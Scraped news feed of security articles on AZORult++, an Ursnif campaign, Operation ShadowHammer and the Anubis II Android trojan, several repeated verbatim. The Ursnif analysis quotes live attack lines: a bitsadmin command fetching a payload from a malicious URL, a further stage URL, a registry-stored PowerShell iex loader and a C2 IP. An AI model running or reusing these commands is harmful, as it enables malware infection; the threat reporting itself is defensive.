“Despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize,” Kaspersky concludes. 

Pierluigi Paganini

(SecurityAffairs – AZORult, malware)

The post A new AZORult C++ variant can establish RDP connections appeared first on Security Affairs.

Security Affairs: A new AZORult C++ variant can establish RDP connections

Experts from Kaspersky observed a new C++ version of the AZORult data stealer that implements the ability to establish RDP connections.


The AZORult Trojan is one of the most popular data stealers in the Russian cybercrime underground. The AZORult stealer was first spotted in 2016 by Proofpoint that discovered it was part of a secondary infection via the Chthonic banking trojan. Later it was involved in many malspam attacks, but only in July 2018, the authors released a substantially updated variant.

AZORult is able to collect targets browser history, login credentials, crypto-wallet files cookies, files from the infected systems, and more.

The malware has a relatively high price tag ($100), it supports a broad functionality (i.e. the use of .bit domains as C&C servers to protect owner anonymity and to make it difficult to block the C&C server), and has high performance.

The malware is also able to download additional payloads onto the infected machines.

The C++ version was first spotted in early March 2019, experts believe it was built by acolytes of CrydBrox, the initial AZORult author, who decided to pull the plug on it after AZORult 3.2 became too widely available.

“It appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++.” reads the analysis published by Kaspersky. “The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible. “

The analysis of the malware reveals that the AZORult++is affected by several issues, suggesting that the project is in the very early stages of development.

ike many other threats it first checks the language ID of the target machine and stops its execution if it identifies Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek.

This C++ version is deficient compared to AZORult 3.3, it doesn’t support stealing a feature from many of the browsers and doesn’t implement a loader functionality.
A more detailed analysis reveals that the C++ version is deficient compared to AZORult 3.3,

AZORult c++

Original AZORult 3.3 and AZORult++ uses the same algorithm for communication with the C&C server, they use the command format, the structure and method of storing harvested data, and encryption keys.

The malware maintains stolen data in RAM and does not write it to the hard disk to avoid detection.

The most concerning improvement for the C++ version is the ability to establish a remote connection to the compromised machines via RDP.

The malware creates a new, hidden administrator account on the machine, and sets a registry key to establish a Remote Desktop Protocol (RDP) connection.

“Despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize,” Kaspersky concludes. 

Pierluigi Paganini

(SecurityAffairs – AZORult, malware)

The post A new AZORult C++ variant can establish RDP connections appeared first on Security Affairs.



Security Affairs

E Hacking News – Latest Hacker News and IT Security News: Ukrainian cyber police again caught Russian hackers

It is not the first time when the Ukrainian cyber police declared about declassifying a group of Russian hackers.

According to police officers, hackers created a mailbox, using the Anonymizer and worked from the territory of Russia.

It turned out that they sent fake emails on behalf of Interior Minister Arsen Avakov. Emails contained rules of conduct for police officers during the elections. In addition, the police were required to take certain actions in favor of one of the candidates.

On the Internet, there is an opinion that the news is fake. Many people know that real hackers do not even need to create a mail to send messages. They can go to the server of the police and send emails directly. And can do it from any other host on which the port number 25 is open, intended for the SMTP protocol.

Perhaps citizens of Ukraine decided to joke this way. They just installed a browser with VPN and created mail. That's enough to hide location. Moreover, this incident was another reason to accuse Russia of intervening in the Ukrainian presidential election.

 


E Hacking News - Latest Hacker News and IT Security News

Ukrainian cyber police again caught Russian hackers

It is not the first time when the Ukrainian cyber police declared about declassifying a group of Russian hackers.

According to police officers, hackers created a mailbox, using the Anonymizer and worked from the territory of Russia.

It turned out that they sent fake emails on behalf of Interior Minister Arsen Avakov. Emails contained rules of conduct for police officers during the elections. In addition, the police were required to take certain actions in favor of one of the candidates.

On the Internet, there is an opinion that the news is fake. Many people know that real hackers do not even need to create a mail to send messages. They can go to the server of the police and send emails directly. And can do it from any other host on which the port number 25 is open, intended for the SMTP protocol.

Perhaps citizens of Ukraine decided to joke this way. They just installed a browser with VPN and created mail. That's enough to hide location. Moreover, this incident was another reason to accuse Russia of intervening in the Ukrainian presidential election.

 

The Ursnif Gangs keep Threatening Italy

Malware researchers at Cybaze-Yoroi ZLab team uncovered a new Ursnif malware campaign that reached several organizations across Italy.

Introduction

The Ursnif trojan confirms itself as one of the most active malware threats in cyberspace, even during the past days, when new attack attempts reached several organizations across Italy. Cybaze-Yoroi ZLab team dissected its infection chain to keep tracking the evolution of this persistent malware threat, analyzing its multiple stages, each one with the purpose to evade detection, sometimes leveraging system tools to achieve its final objective: run the Ursnif payload.

Figure 1: Infection chain of Ursnif malware

Technical Analysis

Unlike previous waves, this one does not leverage steganography or heavily obfuscated powershell payloads. Instead, it abuses a VB script hidden into a compressed archive embedded within an innocent looking email referencing a summon. When users click on “Decreto” hyperlink, they are redirected to a Google Drive web page which opens a fake page where a fake document is shown and it invites them to click on a download link

Figure 2: Drive document “Scarica il documento”

Once clicked on the “Scarica il documento” link into the Drive document, an archive is downloaded on the victim machine from blogger[.]scentasticyoga[.]com, embedding two different files: the first is an obfuscated Visual Basic Script (VBS) and the second one is a legit image placed there to deceive the victim. 

Figure 3: File contained in the Zip file

The VBS code is obfuscated to evade antivirus detection and, in order to confuse the analyst, all the values are manipulated in different steps: using many mathematical operations, very long random variable names and other content encoded in Base64 format. The malicious routine is split in many slices and then recombined at runtime, quite basic but it is effective evasion technique. After a first de-obfuscation phase, a more readable code could be obtained.

Figure 4: Malicious VBS, obfuscated (left) and de-obfuscated (right)

In the end, the infection starts and the malware runs cmd.exe to download the “eyTWUDW.exe” through the Bitsadmin utility, and store it into “%APPDATA%\Local\Temp”.

“C:\Windows\System32\cmd.exe” /c bitsadmin  /transfer msd5 /priority foreground http://blog.practicereiki.com/pagpoftrh54.php C:\Users\admin\AppData\Local\Temp/eyTWUDW.exe

The Bitsadmin utility is legit Microsoft command line tool typically used by sysadmins to download system updates, but during the last years it has also been abused by cyber criminals to masquerade malicious network activities. In this case it has been leveraged to manage the download of the next component of the infection chain from “hxxp://blog[.practicereiki[.com/pagpoftrh54[.php”.

After that, the loader runs “schtasks” to enable the execution of the “eyTWUDW.exe” payload temporary stored in “%APPDATA%\Local\Temp”, and then downloads the next malware stage from

http[://link[.kunstsignal[.net/images/W534K5hp8zGWYvpMJkayjGf/FqWxvwp_2F/1_2BEPHtH1r_2FpG5 /o0BuA8sr5LGg /IDwj8Q6mCoq/5nK9XEb3WoD5wW/y8lJVn5t5QXZMUgDQopzF /oO58ImaZl53M5X3E/whzGq3GIOtuCnK6/o3R_2BwMMv/wAo5qeqZ/a[.avi

Through the mentioned URL, it was possible to intercept the downloaded encrypted payload, sub-sequentially digested by the “eyTWUDW.exe“ process which, after an internal decryption phase, stores it into a registry key, establishing a file-less persistence on the target machine. 

Figure 5: Registry key set by malware

Moreover, the malware contacts another time the C2 to confirm the successful infection, sending a check-in HTTP request containing parameters used to identify the malware implant:

ParameterValueDescription
soft3Major release
version214071Malware software version
userb2861874feedbf530d08c77a9d5833deUser id of the infected machine
server12Server ID
id822Synthetic id of infected machine
crc1checksum
uptime235Time of infection start

Table 1: Ursnif infection format

Investigating the remote destination where the C2 is hosted, it results active since 05 March 2019, just a few times before the attack wave; destination unknown to many AV Vendors at time of attack, suggesting this portion of the infrastructure has been specifically prepared for the Italian landscape.

At this point, “eyTWUDW.exe” runs the previously stored script through the following command, invoking Powershell code from the registry sub-key “amxrters”.

powershell  iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E’).amxrters))

The content of this additional script is obfuscated with layers of Base-64 encoding, arrays of integers and char-code to byte conversions. Dissecting the script we obtained a more readable code:

Figure 6: Script extracted from registry key (left Obfuscated, right Deobfuscated)

The first part contains dependencies loaded by the malware to interact with the OS, such as the classic “kernel32” and, more interestingly, one of the last called functions reveal the usage of the same APC injection techniques observed in previous attack waves to inject the payload into the “Explorer.exe“ process (rif. “QueueUserAPC” in “Dissecting the Latest Ursnif DHL themed Campaign”). The de-obfuscation of the central part of the script reveals the classical string “This program cannot be run in DOS mode”, part of the header of the final stage of the malware will be injected into the Explorer process.

Figure 7: Ursnif final payload extracted from script

After noticing the payload is very similar to another Ursnif sample yet analyzed in “Ursnif Long Live the Steganography”, we proceeded with a differential analysis to spot eventual variations between the samples. 

Figure 8: Diff. analysis between already analyzed sample (1)

At first look, there are many common parts between the samples, for instance both files are compiled in 64 bit mode and the value in the PE sections are closely similar. However, the compilation time were different: while the older is the 28th January, the newer one is 11 March, almost a week after the comparison on the internet of the command and control server host 46.8.18[.186 (CONTEL-NET-3 RU).

Figure 9: Diff. analysis between already analyzed sample (2)

Conclusion

Ursnif confirms itself as one of the most active and aggressive malware threats spreading both worldwide and within the Italian cyber-landscape. Threat actors behind these attacks constantly update and vary their infection chains to avoid security controls and evade antivirus detection, luring users with context sounding email messages being opened by thousands of victims each attack wave. A serious threat for the security of users data and company assets.

Additional details, including Indicators of Compromise and Yara rules are available in the report published on the Yoroi Blog.

https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/

Pierluigi Paganini

(SecurityAffairs – Ursnif, malware)

The post The Ursnif Gangs keep Threatening Italy appeared first on Security Affairs.

Security Affairs: Operation ShadowHammer – Supply-Chain attack hit ASUS users

Operation ShadowHammer – ASUS is the last victim of a clamorous supply chain attack that delivered a backdoor to more than one million users, Kaspersky Lab reported.

Over 1 million ASUS users may have been impacted by a supply chain attack that leveraged the ASUS Live Update utility to inject a backdoor in ASUS systems.

Kaspersky tracked the attack as Operation ShadowHammer, it took place between June and November 2018, but experts discovered it in January 2019.

“In January 2019, we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility. The attack took place between June and November 2018 and according to our telemetry, it affected a large number of users.” reads the analysis published by Kaspersky Lab.

The ASUS Live Update utility is pre-installed on most ASUS computers, it allows the vendor to automatically update several components, including drivers, BIOS, UEFI, and applications. Hackers also digitally signed their malware with a stolen digital certificate used by ASUS to sign legitimate binaries, a technique already observed in other supply chain attacks such as the CCleaner and ShadowPad hacks

Experts pointed out that Operation ShadowHammer was a targeted attack that surgically hit only 600 specific MAC addresses, but Kaspersky couldn’t determine the exact number of users who installed the tainted utility.

Based on Kaspersky’s statistics, over 57,000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time. Experts estimate that the extent of the problem is huge and it is possibly affecting over a million users worldwide.

“The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses.” continues Kaspersky.

“To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.”

Threat actors behind the Operation ShadowHammer delivered a signed version of the backdoored versions of ASUS software. The software was hosted and distributed through the official ASUS update servers, experts defined this supply chain attack very sophisticated.

“While this means that potentially every user of the affected software could have become a victim, actors behind ShadowHammer were focused on gaining access to several hundreds of users, which they had prior knowledge about,” Kaspersky Lab continues.

Once the backdoor is executed on a victim’s device, the malicious code would check the MAC address against a list of addresses. If the MAC address is in the list it continues the infections, otherwise, the malware remains hidden.

Attackers used a modular approach and extra precautions when executing code to avoid detection. Kaspersky experts argue attackers are very advanced and their arsenal reflects a very high level of development within the group.

Kaspersky experts attribute the attacks to the BARIUM APT group, the same threat attacker behind the ShadowPad and CCleaner supply chain attacks.

The BARIUM APT is believed to be under the Winnti umbrella along other APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, LEADPassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and Procedures (TTPs) and in some cases shared portions of the same hacking infrastructure.

Below the geographic distribution of the victims of Operation Shadowhammer.

operation shadowhammer

According to Kaspersky at least other three vendors in Asia were hit with similar attack techniques.

“The selected vendors are extremely attractive targets for APT groups that might want to take advantage of their vast customer base,” said Vitaly Kamluk, Director of Global Research and Analysis Team, APAC, at Kaspersky Lab. “It is not yet very clear what the ultimate goal of the attackers was and we are still researching who was behind the attack.”

Kaspersky has released a tool to allow users to determine if they were impacted, the company also plans to provide additional info on the incident at its SAS 2019 conference.

Pierluigi Paganini

(SecurityAffairs – Asus, supply chain attack)

The post Operation ShadowHammer – Supply-Chain attack hit ASUS users appeared first on Security Affairs.



Security Affairs

Operation ShadowHammer – Supply-Chain attack hit ASUS users

Operation ShadowHammer – ASUS is the last victim of a clamorous supply chain attack that delivered a backdoor to more than one million users, Kaspersky Lab reported.

Over 1 million ASUS users may have been impacted by a supply chain attack that leveraged the ASUS Live Update utility to inject a backdoor in ASUS systems.

Kaspersky tracked the attack as Operation ShadowHammer, it took place between June and November 2018, but experts discovered it in January 2019.

“In January 2019, we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility. The attack took place between June and November 2018 and according to our telemetry, it affected a large number of users.” reads the analysis published by Kaspersky Lab.

The ASUS Live Update utility is pre-installed on most ASUS computers, it allows the vendor to automatically update several components, including drivers, BIOS, UEFI, and applications. Hackers also digitally signed their malware with a stolen digital certificate used by ASUS to sign legitimate binaries, a technique already observed in other supply chain attacks such as the CCleaner and ShadowPad hacks

Experts pointed out that Operation ShadowHammer was a targeted attack that surgically hit only 600 specific MAC addresses, but Kaspersky couldn’t determine the exact number of users who installed the tainted utility.

Based on Kaspersky’s statistics, over 57,000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time. Experts estimate that the extent of the problem is huge and it is possibly affecting over a million users worldwide.

“The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses.” continues Kaspersky.

“To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.”

Threat actors behind the Operation ShadowHammer delivered a signed version of the backdoored versions of ASUS software. The software was hosted and distributed through the official ASUS update servers, experts defined this supply chain attack very sophisticated.

“While this means that potentially every user of the affected software could have become a victim, actors behind ShadowHammer were focused on gaining access to several hundreds of users, which they had prior knowledge about,” Kaspersky Lab continues.

Once the backdoor is executed on a victim’s device, the malicious code would check the MAC address against a list of addresses. If the MAC address is in the list it continues the infections, otherwise, the malware remains hidden.

Attackers used a modular approach and extra precautions when executing code to avoid detection. Kaspersky experts argue attackers are very advanced and their arsenal reflects a very high level of development within the group.

Kaspersky experts attribute the attacks to the BARIUM APT group, the same threat attacker behind the ShadowPad and CCleaner supply chain attacks.

The BARIUM APT is believed to be under the Winnti umbrella along other APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, LEADPassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and Procedures (TTPs) and in some cases shared portions of the same hacking infrastructure.

Below the geographic distribution of the victims of Operation Shadowhammer.

operation shadowhammer

According to Kaspersky at least other three vendors in Asia were hit with similar attack techniques.

“The selected vendors are extremely attractive targets for APT groups that might want to take advantage of their vast customer base,” said Vitaly Kamluk, Director of Global Research and Analysis Team, APAC, at Kaspersky Lab. “It is not yet very clear what the ultimate goal of the attackers was and we are still researching who was behind the attack.”

Kaspersky has released a tool to allow users to determine if they were impacted, the company also plans to provide additional info on the incident at its SAS 2019 conference.

Pierluigi Paganini

(SecurityAffairs – Asus, supply chain attack)

The post Operation ShadowHammer – Supply-Chain attack hit ASUS users appeared first on Security Affairs.

Security Affairs: Anubis II – malware and afterlife

Due to the growing demand for Android banking malware, threat actors continue using Anubis even is the creator has vanished.

Introduction

Besides being the Egyptian God associated with mummification and afterlife, Anubis is also an Android banking malware that has caused quite some trouble for over 300 financial institutions worldwide since 2017.

Anubis II is the Android banking Trojan created and advertised by an actor with the nickname “maza-in”. This malware family goes beyond the well-known overlay attacks by combining advanced features such as screen streaming, remote file browsing, sound recording, keylogging and even a network proxy, making it an efficient banking malware but also a potential spying tool. Effectively, Anubis can be considered one of the most used Android banking Trojans since late 2017.

As banking malware, Anubis operates by tricking its victims into providing personal and sensitive information such as online banking credentials, banking security codes and even credit card details. Many victims do not realise that the malware application does not pretend to be the bank, it mostly hides as a third-party app and therefore remains under the radar of the average user. Disguises used by Anubis where for example: fake mobile games, fake software updates, fake post/mail apps, fake flash-player apps, fake utility apps, fake browsers and even fake social-network and communication apps.

The malware was rented privately to a limited number of “customers”; criminals willing to use such malware to perform fraud. At the moment of writing, the renting service is supposedly disrupted due to the author being under arrest or having simply vanished with customers’ money, but the malware itself is alive and kicking.

Through this blog post ThreatFabric experts revisit major stages of Anubis’ evolution and explain what changes can be expected on the threat landscape.

Origins: It all started with BankBot

In December 2016 the actor “maza-in” wrote an article named “Android BOT from scratch” in which he shared source code of a new Android banking Trojan capable of sending and intercepting text messages as well as performing overlay attacks to steal credentials.

The article received a lot of attention as it contained sources of both the C2 panel and the Android client (bot), giving actors the tools to create a working banking Trojan with minimum effort. The first malware based on the code from this article was spotted by Dr. Web in Jan 2017 and was dubbed “Android.BankBot.149.origin”. Although being a generic name for banking malware, “BankBot” became the name attributed to all Trojans derived from the shared source code.

BankBot

Throughout 2017, many actors used Bankbot for their fraudulent operations, but without proper support and updates most abandoned the malware months later. Some however used the source code to build their own malware. Some examples are:LokiBot (2017) – the actor behind this malware adapted the original code and introduced the ransomware and proxy capabilitiesRazdel (2017) – a banking malware that primarily target Central European banks, introduced a novel trick to implement overlay attacksMysteryBot (2018) – another malware from the same actor that was behind “LokiBot”, introduced a novel keylogging approach and on-device fraud techniqueCometBot (2019) – a copy of the original code with minor modifications, primarily targeting German banks at the moment

Although most actors reusing the original code changed the Trojan into something that suited their respective needs, all of them also kept the original features from the original shared code. The list of these original features is very limited compared to recent banking Trojans but enough to steal personal information from the victims:Overlaying: Dynamic – C2 based (possibility to remotely modify the list of targeted application)SMS blocking (hiding messages from the victim)SMS sending (capability to send messages from the infected device)SMS harvesting (possibility to send a copy of all message to the C2 server)

About Anubis

Rise of maza-in

By publishing the aforementioned article, maza-in earned himself a reputation of Android expert on underground forums. He started to share tips and tricks to help other threat actors deal with technical issues and enhance their own malware. Shortly after the initial article, the actor even conducted an interview with Forbes magazine named “I Want To Expose Google’s Mistakes”, stating that he published the malicious code to improve the state of Android security, by showing design flaws in the system that can be easily abused. 

He also frequently reviewed each new Android banking Trojan available for renting. In his reviews, he evaluated the technical capabilities and provided his opinion about the actor. Later, a review by maza-in almost became a de facto step to start rental of Android banking malware, as users of forums were asking for the review before they would buy/rent a new Trojan.

Although claiming to have the most noble intentions, maza-in also pursued more nefarious goals. Information from forums shows that at the same time he shared the code of the Trojan in the tutorial article, he was developing a “full” version of the Trojan privately. After some time he started to privately rent it.

The malware was heavily enhanced compared to its original version, adding modern overlaying techniques, device screen recording and streaming, a network proxy feature, keylogging and the ability to steal files from the infected device. maza-in names the malware Anubis and used the following logo in his advertisement of the malware:

Anubis II

The list of bot features below shows how much maza-in improved upon the original shared BankBot code to create (the latest version of) Anubis:Overlaying: Static (hardcoded in bot)Overlaying: Dynamic (C2 based)KeyloggingContact list collectionScreen streamingSound recordingSMS harvesting: SMS forwardingSMS blockingSMS sendingFiles/pictures collectionCalls: USSD request makingRansomware: CryptolockerRemote actions: Data-wipingRemote actions: Back-connect proxyNotifications: Push notificationsC2 Resilience: Twitter/Telegram/Pastebin C2 update channels

In addition to the new features and improvements made, Anubis also has a larger (default) target list. In the Appendix you can find a full list of apps targeted by Anubis (437 applications in total).

Distribution

As a rented Trojan, Anubis was distributed using a wide range of delivery techniques:Google Play campaigns: using self-made or rented droppers actors were able to bypass Google Play security mechanisms and spread the Trojan using the official app store, potentially infecting thousands of victims at a time.Spam campaigns: using SMS or email, actors sent messages to social engineer the victims with a request to install or update some legitimate application, instead linking to the malware.Web-redirection of the victim to a fake landing page containing a request to install or update some legitimate application, instead linking to the malware; using advertisement on websites, hacked sites, traffic exchanges and other black hat SEO methods

It is in the interest of the actors to infect as many devices as possible as it increases the chances to commit fraud successfully. The problem for Play Store users is that even without being social-engineered, due to the increasing number of Google Play malware campaigns, the risk of downloading a dropper mimicking a benign application has increased significantly. Therefore the statement “only download apps from the official app store” is not enough to remain safe from malware.

Recent updates

The rental of Anubis II was open from Q4 2017 until February 2019. During Q1 2019, actor maza-in vanished from the threat landscape, leaving existing customers without support and updates. Although exact details about the vanishing of the actor remain unclear at the time of writing, a chain of events confirms that some abnormal activity took place around Anubis and its author.On December 13 2018 maza-in announces the release of Anubis 2.5; seemingly only redesigning the backend web interface, while actually stating that he rewrote the whole bot code.On January 16 2019 Anubis code is leaked in an underground forum (both backend code and unobfuscated APK).On February 14 2019 for the first time an Anubis sample seen targeting Russian banks only is spotted (indicating a new campaign / new operator).On February 25 2019 some complaints from Anubis customers appear in underground forums stating that maza-in and Anubis support no longer reply to messages.On March 04 2019, the admin of one underground forum states maza-in got arrested. Shortly after this, accounts of maza-in are banned on multiple forums.During March 2019, actor Aldesa (who shares a connection with maza-in) creates a post to sell the so-called “Anubis 3” malware on an underground forum. His post gets removed by the admin quite quickly.

We can conclude that the Anubis Trojan is no longer officially rented. However, ThreatFabric experts have observed certain Anubis customers having access to the builder and admin panel, which explains why the operations have not been totally disrupted.

Although it is hard to say why maza-in really vanished, the fact that some code has been leaked combined with recent observations of unobfuscated Anubis samples in the wild, may suggest that the malware will be used by other actors and thus remain active.

What we learned from history

In the past, several other banking Trojans have seen their operations being disrupted and/or source code leaked. It often results in a decrease in the operations and number of samples generated, but most often activity resumes after some quiet time.

There might be some explanations to this such as actors/operators being scared of sudden changes, possibly indicating take-downs or arrests; the time needed to get hands on the right resources and accounts to resume operations; delay between the moment operations stop and leaking of source code; etc… In some cases, the calm after the storm resulted in some new variants appearing on the threat landscape, indicating the delay was probably due to the need for other actors to build their own malware version/variant based on the leaked code.

Marcher

In 2016, the operations of another popular Android banking malware named Marcher were disrupted in a similar way to what happened to Anubis. The actor behind the Marcher Trojan got banned and the renting service was discontinued. The renting model of that Trojan allowed purchase of the APK (bot) builder, therefore a number of Marcher actors obtained the source code of the admin panel and the bot itself.

Some of them resold the sources and some of them used them as a base for their own banking malware; therefore, although operations were disrupted the Trojan remained active for a while and new malware families emerged. Examples of modern families based on Marcher are:ExoBotGustuffDiseaseBotBubabotNeobot

Even now it sometimes happens that some new Marcher-based Trojans appear on the threat-landscape.

The story repeats itself

Looking at actual situation for Anubis, several scenarios are possible:Actors having access to relevant resources continue using Anubis in it’s actual stateSome actor or actor group will step in and will become the new maintainer of Anubis, business starts overActors stop using Anubis and wait for some new banking malware to become availableActors having access to relevant resources will start to modify and improve the existing code base to create their own malware

As mentioned before, Anubis itself is based on the Bankbot Trojan, which was made public on purpose. This resulted in the appearance of at least 4 distinctive malware families/variants as shown in the picture hereunder:

BankBot Tree

We can say that Anubis itself also sprung into existence from the publicly available BankBot code. Considering the increasing demand for Android banking malware and the fact that unobfuscated versions of the bot and the code of the admin panel of Anubis are publicly available we can definitely expect similar events.

Anubis statistics

As Anubis is a rented banking Trojan, each buyer/operator can decide the effective list of applications the Trojan should target. This results in many different campaigns with different objectives.

Although there have been several different campaigns targeting different sets of applications, when considering the average Anubis sample, the number of targets is approximately 370 unique applications.

Target locations

Based on the countries for which the targeted applications are made, it is possible to make statistics of the number of targets per region.

As can be seen in following chart, it is clear that there is a strong interest in institutions providing services in Europe, Asia and the Americas:

Targets per region

When we narrow this down to subregions we can see that the targets are in fact institutions active in Europe, West-Asia, North-America and Australia.

Interestingly, those locations match banking malware’s “usual suspects”; many of the previously observed banking malware families have been seen primarily targeting financial institutions in those subregions.

Targets per subregion

Anubis has been targeting applications from financial institutions present in more than 100 different countries. The top 20 victim countries are visible in following chart:

Targets per country

Keep in mind that statistics can be slightly biased due to certain applications serving a large number of different countries.

Target types

Based on the application types provided by Google, we can see based on the targeted applications that although the Anubis Trojan is a banker and therefore mainly targets “Finance” apps, it also has interest in other types of apps.

As visible in following chart, the application types in second and third position of interest are “Shopping” and “Business” apps, which can be explained by the fact that is shouldn’t look suspicious to the victim when such applications are requesting update of payment details or other sensitive information.

After “Finance” apps, the app types of second choice are “Shopping” and “Business” followed by “Tools”, “Communication” and “Social” apps. Therefore, understand that although such malware is called banking malware its aim is to perform fraud and therefore targets more than only financial apps to achieve its goal.

Target types

In conclusion, what’s next

Considering the growing demand for Android banking malware, we can definitely expect actors to continue using Anubis. Although the creator has vanished the threat is still real; the malware will continue to operate and provide its advanced features to ill-intentioned actors.

We can expect the following events to take place:Anubis customers having sufficient resources will continue to use the Trojan.As some actors have access to both the Anubis admin panel and builder it’s likely they will try to sell it by themselves.Some disgruntled customers having access to the sources might leak additional code and resources as retaliation.As it’s known that some actors have access to the right resources we can expect some enhancement and maybe even new features.

If those events indeed take place, it will result in new actors using Anubis, new campaigns and maybe even new malware variants or malware families based on the Anubis code.

Knowledge of the threat landscape and implementation of the right detection tools remains crucial to be able to protect yourself from fraud; Anubis is only one of the many Trojans active in the wild!

Further info including Anubis II samples are reported in the original analysis published by the ThreatFabric.

https://www.threatfabric.com/blogs/anubis_2_malware_and_afterlife.html

Pierluigi Paganini

(SecurityAffairs – malware, Anubis II)

The post Anubis II – malware and afterlife appeared first on Security Affairs.



Security Affairs

Anubis II – malware and afterlife

Due to the growing demand for Android banking malware, threat actors continue using Anubis even is the creator has vanished.

Introduction

Besides being the Egyptian God associated with mummification and afterlife, Anubis is also an Android banking malware that has caused quite some trouble for over 300 financial institutions worldwide since 2017.

Anubis II is the Android banking Trojan created and advertised by an actor with the nickname “maza-in”. This malware family goes beyond the well-known overlay attacks by combining advanced features such as screen streaming, remote file browsing, sound recording, keylogging and even a network proxy, making it an efficient banking malware but also a potential spying tool. Effectively, Anubis can be considered one of the most used Android banking Trojans since late 2017.

As banking malware, Anubis operates by tricking its victims into providing personal and sensitive information such as online banking credentials, banking security codes and even credit card details. Many victims do not realise that the malware application does not pretend to be the bank, it mostly hides as a third-party app and therefore remains under the radar of the average user. Disguises used by Anubis where for example: fake mobile games, fake software updates, fake post/mail apps, fake flash-player apps, fake utility apps, fake browsers and even fake social-network and communication apps.

The malware was rented privately to a limited number of “customers”; criminals willing to use such malware to perform fraud. At the moment of writing, the renting service is supposedly disrupted due to the author being under arrest or having simply vanished with customers’ money, but the malware itself is alive and kicking.

Through this blog post ThreatFabric experts revisit major stages of Anubis’ evolution and explain what changes can be expected on the threat landscape.

Origins: It all started with BankBot

In December 2016 the actor “maza-in” wrote an article named “Android BOT from scratch” in which he shared source code of a new Android banking Trojan capable of sending and intercepting text messages as well as performing overlay attacks to steal credentials.

The article received a lot of attention as it contained sources of both the C2 panel and the Android client (bot), giving actors the tools to create a working banking Trojan with minimum effort. The first malware based on the code from this article was spotted by Dr. Web in Jan 2017 and was dubbed “Android.BankBot.149.origin”. Although being a generic name for banking malware, “BankBot” became the name attributed to all Trojans derived from the shared source code.

BankBot

Throughout 2017, many actors used Bankbot for their fraudulent operations, but without proper support and updates most abandoned the malware months later. Some however used the source code to build their own malware. Some examples are:LokiBot (2017) – the actor behind this malware adapted the original code and introduced the ransomware and proxy capabilitiesRazdel (2017) – a banking malware that primarily target Central European banks, introduced a novel trick to implement overlay attacksMysteryBot (2018) – another malware from the same actor that was behind “LokiBot”, introduced a novel keylogging approach and on-device fraud techniqueCometBot (2019) – a copy of the original code with minor modifications, primarily targeting German banks at the moment

Although most actors reusing the original code changed the Trojan into something that suited their respective needs, all of them also kept the original features from the original shared code. The list of these original features is very limited compared to recent banking Trojans but enough to steal personal information from the victims:Overlaying: Dynamic – C2 based (possibility to remotely modify the list of targeted application)SMS blocking (hiding messages from the victim)SMS sending (capability to send messages from the infected device)SMS harvesting (possibility to send a copy of all message to the C2 server)

About Anubis

Rise of maza-in

By publishing the aforementioned article, maza-in earned himself a reputation of Android expert on underground forums. He started to share tips and tricks to help other threat actors deal with technical issues and enhance their own malware. Shortly after the initial article, the actor even conducted an interview with Forbes magazine named “I Want To Expose Google’s Mistakes”, stating that he published the malicious code to improve the state of Android security, by showing design flaws in the system that can be easily abused. 

He also frequently reviewed each new Android banking Trojan available for renting. In his reviews, he evaluated the technical capabilities and provided his opinion about the actor. Later, a review by maza-in almost became a de facto step to start rental of Android banking malware, as users of forums were asking for the review before they would buy/rent a new Trojan.

Although claiming to have the most noble intentions, maza-in also pursued more nefarious goals. Information from forums shows that at the same time he shared the code of the Trojan in the tutorial article, he was developing a “full” version of the Trojan privately. After some time he started to privately rent it.

The malware was heavily enhanced compared to its original version, adding modern overlaying techniques, device screen recording and streaming, a network proxy feature, keylogging and the ability to steal files from the infected device. maza-in names the malware Anubis and used the following logo in his advertisement of the malware:

Anubis II

The list of bot features below shows how much maza-in improved upon the original shared BankBot code to create (the latest version of) Anubis:Overlaying: Static (hardcoded in bot)Overlaying: Dynamic (C2 based)KeyloggingContact list collectionScreen streamingSound recordingSMS harvesting: SMS forwardingSMS blockingSMS sendingFiles/pictures collectionCalls: USSD request makingRansomware: CryptolockerRemote actions: Data-wipingRemote actions: Back-connect proxyNotifications: Push notificationsC2 Resilience: Twitter/Telegram/Pastebin C2 update channels

In addition to the new features and improvements made, Anubis also has a larger (default) target list. In the Appendix you can find a full list of apps targeted by Anubis (437 applications in total).

Distribution

As a rented Trojan, Anubis was distributed using a wide range of delivery techniques:Google Play campaigns: using self-made or rented droppers actors were able to bypass Google Play security mechanisms and spread the Trojan using the official app store, potentially infecting thousands of victims at a time.Spam campaigns: using SMS or email, actors sent messages to social engineer the victims with a request to install or update some legitimate application, instead linking to the malware.Web-redirection of the victim to a fake landing page containing a request to install or update some legitimate application, instead linking to the malware; using advertisement on websites, hacked sites, traffic exchanges and other black hat SEO methods

